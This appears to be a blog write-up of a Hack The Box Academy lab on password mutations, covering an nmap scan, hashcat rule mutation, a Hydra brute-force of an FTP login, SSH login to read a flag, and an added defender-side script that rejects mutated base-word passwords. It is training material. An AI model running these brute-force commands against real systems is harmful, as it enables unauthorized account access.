DEV Community

maz4l

HTB Academy: Password Attacks Module - Password Mutations Section

Kali logo from MazalArt

Task

Create a mutated wordlist using the files in the ZIP file under "Resources." Use this wordlist to brute-force the password for the user "sam." Once successful, log in via SSH and submit the flag from flag.txt.

Steps:

- **Run Nmap Scan**.
   Identify open ports and services on the target machine:
   ```bash
   nmap -sV -Pn <$target_ip>
   ```
   Example output:
   ```
   PORT    STATE SERVICE     VERSION
   21/tcp  open  ftp         vsftpd 3.0.3
   22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
   139/tcp open  netbios-ssn Samba smbd 4.6.2
   445/tcp open  netbios-ssn Samba smbd 4.6.2
   ```

- **Create Password List and Custom Rule**.
   Using the files provided in the "Resources" section, create the `password.list` and `custom.rule`:
   ```bash
   sudo nano password.list
   sudo nano custom.rule
   ```

- **Generate Mutated Wordlist**.
   Use Hashcat to generate a mutated wordlist:
   ```bash
   hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
   wc -l mut_password.list
   93912 mut_password.list
   ```

- **Filter Mutated Wordlist**.
   Filter the mutated wordlist for passwords with a length of 11 or more characters, including at least one number, one letter, and one special symbol. The `sed` pattern itself enforces only the minimum length and the allowed character classes (alphanumeric and punctuation):
   ```bash
   sed -n '/^[[:alnum:][:punct:]]\{11,\}$/p' mut_password.list > mut_pass.list
   wc -l mut_pass.list
   36240  mut_pass.list
   ```

- **Brute Force with Hydra**.
   Use Hydra to find the password for the user "sam" on the FTP service:
   ```bash
   hydra -l sam -P mut_pass.list ftp://<$target_ip> -t 48 -v
   ```
   Example successful output:
   ```
   [21][ftp] host: 10.129.x.xxx login: sam password: B@t********
   ```

- **Log in via SSH**.
   Connect to the target machine using the found credentials:
   ```bash
   ssh sam@<$target_ip>
   password: B@t********
   ```

- **Find and Retrieve the Flag**.
   Search for the flag file and read its contents:
   ```bash
   find / -name "flag.txt" 2>/dev/null
   ```
   Example:
   ```bash
   /home/sam/smb/flag.txt
   cat /home/sam/smb/flag.txt
   ```

The flag is:

```
HTB{P4**_*********}
```

This task demonstrated how to use password mutation rules to generate a custom wordlist and perform a brute-force attack to retrieve the flag.
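
Seen from the defender's side, the mutation and filter steps show why a complexity policy alone is not enough. The added example below (not part of the original post or the HTB module) checks a candidate against the 11-character letter/digit/symbol policy from the filter step and also rejects it when it is only a base word with case changes, character swaps, or digits and symbols added at the ends. The base words and the substitution table are constructed assumptions, not the contents of the lab's `password.list` or `custom.rule`.

```shell
#!/bin/sh
# Added example, not from the original post: a defender-side password check.
# The policy (11+ chars, letter, digit, symbol) is the one in the filter step.
# BASE_WORDS is a constructed sample list (lowercase letters only), not the
# lab's password.list; the substitution table is likewise an assumption.
BASE_WORDS="password welcome summer football"

# meets_policy PW: succeeds if PW has 11+ chars, a letter, a digit, a symbol.
meets_policy() {
  [ "${#1}" -ge 11 ] || return 1
  for class in alpha digit punct; do
    printf '%s\n' "$1" | grep -q "[[:${class}:]]" || return 1
  done
}

# leet_regex WORD: regex that matches WORD with common character swaps.
leet_regex() {
  printf '%s\n' "$1" | sed -e 's/a/[a@4]/g' -e 's/e/[e3]/g' -e 's/i/[i1!]/g' \
    -e 's/l/[l1]/g' -e 's/o/[o0]/g' -e 's/s/[s$5]/g' -e 's/t/[t7]/g'
}

# is_mutated_word PW: succeeds if PW is a base word with case changes,
# character swaps, and digits or symbols added at either end.
is_mutated_word() {
  edge='[[:digit:][:punct:]]*'
  for word in $BASE_WORDS; do
    if printf '%s\n' "$1" | grep -qi "^${edge}$(leet_regex "$word")${edge}\$"
    then return 0; fi
  done
  return 1
}

# acceptable PW: passes the complexity policy and is not a mutated base word.
acceptable() {
  meets_policy "$1" && ! is_mutated_word "$1"
}

# Constructed candidates: the first two satisfy the policy yet are rejected.
for pw in 'P@ssw0rd2024!' 'Summer2024!' 'Welcome1!' 'tr4in-Cobalt-ledger'; do
  if acceptable "$pw"; then verdict=accept; else verdict=reject; fi
  printf '%-22s %s\n' "$pw" "$verdict"
done
```
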

Happy Hacking!
